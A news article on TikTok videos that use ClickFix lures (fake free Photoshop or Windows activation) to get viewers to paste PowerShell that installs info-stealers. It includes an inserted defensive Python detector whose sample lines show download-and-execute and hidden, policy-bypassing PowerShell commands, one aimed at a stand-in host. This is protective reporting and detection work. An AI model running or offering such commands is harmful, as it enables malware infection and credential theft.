TikTok video promising you free Photoshop or Windows license? Don't do it - it's a scam

If a TikTok 'tech tip' tells you to paste code, it's a scam. These videos have been popping up on the platform, tempting users with promises of free software licenses in exchange for a few simple steps. But don't be fooled – they're actually a clever way for hackers to steal your credentials and system information.

TikTok is being exploited as a delivery platform to spread information-stealing malware and other payloads, with free software acting as the bait. This phenomenon was recently highlighted by Senior ISC Handler Xavier Mertens in a post published on the SANS Institute's Internet Storm Center website. Mertens explained that the wave of attacks on TikTok leverages ClickFix social engineering techniques to dupe victims into downloading malware onto their systems.

Mertens posted an example video, which has garnered over 500 likes, that shows how the scam typically begins. In this video, a scammer pretends to provide viewers with an easy way to activate Photoshop for free. The victim is asked to start PowerShell as an administrator and run one line of code, which then executes "Updater.exe". That file is actually AuroStealer, a Trojan designed to steal credentials and system information.

But that's not all – additional shellcode is also launched in memory, further compromising the user's device. ZDNET explored TikTok for similar videos and was surprised by how many were live. For instance, in one screenshot, the author was promoting a fake way to download and install Adobe Photoshop without the need for a license.

Other examples we found included fake, free ways to license Microsoft Windows. It's clear that ClickFix is a particularly nasty social engineering technique that tries to bypass traditional anti-phishing protections by tricking users into "hacking" themselves. Instructions are given in one form or another, which could include using a Windows shortcut and copy-pasting a snippet of code into a command prompt to trigger a PowerShell script.

These instructions are laid out in a way that is easy to understand and are given a fake purpose – such as for fixing a minor technical glitch, a way to use paid software for free, or as a "life hack" for improving popular streaming services. Once the victim has unwittingly opened up their device for exploitation, a malicious payload is deployed and executed.
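A defender-side illustration of the pattern described above, added here and not taken from the article or from Mertens' post: a heuristic triage of logged PowerShell command text (for example, script-block or process-creation logs) that flags one-liners which download content and execute it in memory. The indicator list, function names and sample lines are assumptions constructed for this example.

```python
import re

# Heuristic indicators for paste-and-run (ClickFix-style) PowerShell one-liners.
# This list is an assumption for the example, not an exhaustive ruleset.
INDICATORS = {
    "download": re.compile(
        r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|curl|wget)\b"
        r"|downloadstring|downloadfile|net\.webclient", re.I),
    "exec_in_memory": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "encoded": re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I),
    "hidden_window": re.compile(r"\s-w(indowstyle)?\s+hidden\b", re.I),
    "policy_bypass": re.compile(r"\s-(ep|executionpolicy)\s+bypass\b", re.I),
}
POWERSHELL = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
EVASION = {"encoded", "hidden_window", "policy_bypass"}


def classify(text):
    """Return (verdict, matched_indicator_names) for one logged command."""
    padded = f" {text} "  # lets the switch patterns match at either end
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search(padded))
    # Fetching remote content and evaluating it in one line is the core signal.
    if "download" in hits and "exec_in_memory" in hits:
        return "high", hits
    # Obfuscation or stealth switches on a PowerShell launch deserve a look.
    if POWERSHELL.search(text) and EVASION & set(hits):
        return "review", hits
    return "ok", hits


def triage(lines):
    """Keep only the lines an analyst should inspect, with their verdicts."""
    results = [(classify(line)[0], line) for line in lines]
    return [(verdict, line) for verdict, line in results if verdict != "ok"]


# Constructed sample log lines (not real indicators; example.invalid is reserved).
SAMPLE_LINES = [
    "iex (irm https://example.invalid/activate)",
    r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    "powershell -w hidden -ep bypass -enc PLACEHOLDER",
    "Invoke-WebRequest https://example.invalid/report.csv -OutFile report.csv",
]

if __name__ == "__main__":
    for verdict, line in triage(SAMPLE_LINES):
        print(f"[{verdict}] {line}")
```

A plain download with no in-memory execution is deliberately left unflagged to keep noise down; tune the indicators to your own environment's normal administrative activity.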

Malware recorded in ClickFix campaigns includes information stealers, Remote Access Trojans (RATs), ransomware, and worms. This is not the first time TikTok and ClickFix have been linked. Back in March, cybersecurity researchers from Trend Micro reported that TikTok videos, potentially generated through AI tools, were being distributed on the platform to spread Vidar and StealC information stealers.

A network of faceless accounts posted videos on topics including improving Spotify and included step-by-step instructions that, instead, launched a PowerShell command to load malware. The researchers noted that "the vast user base and algorithmic reach of social media platforms provide an ideal delivery mechanism for threat actors."

For attackers, this means broad distribution without the logistical burden of maintaining an infrastructure. Earlier this month, Microsoft warned that ClickFix is becoming increasingly popular as a method of infiltrating networks, stealing data, and deploying malware.

In the Redmond giant's latest Digital Defense report, Microsoft said that since 2024, ClickFix tactics have been recorded as a method of initial access in 47% of attacks, ahead of phishing and password "spray and pray" attack methods. So, how can you protect yourself against ClickFix attacks?

Don't execute a command on your device if you are not sure about the source of the code or its true purpose, especially if you find the instructions on social media, where they're unlikely to be vetted. Now that you know this social engineering method exists, stay suspicious. Tell your friends, too.

In conclusion, TikTok is being exploited as a platform for spreading malware and other malicious payloads, using free software as bait. If you see a video promising you a free Photoshop or Windows license in exchange for a few simple steps, it's likely a scam. Stay vigilant and protect yourself against these types of attacks by verifying the source of any code or instructions before executing them on your device.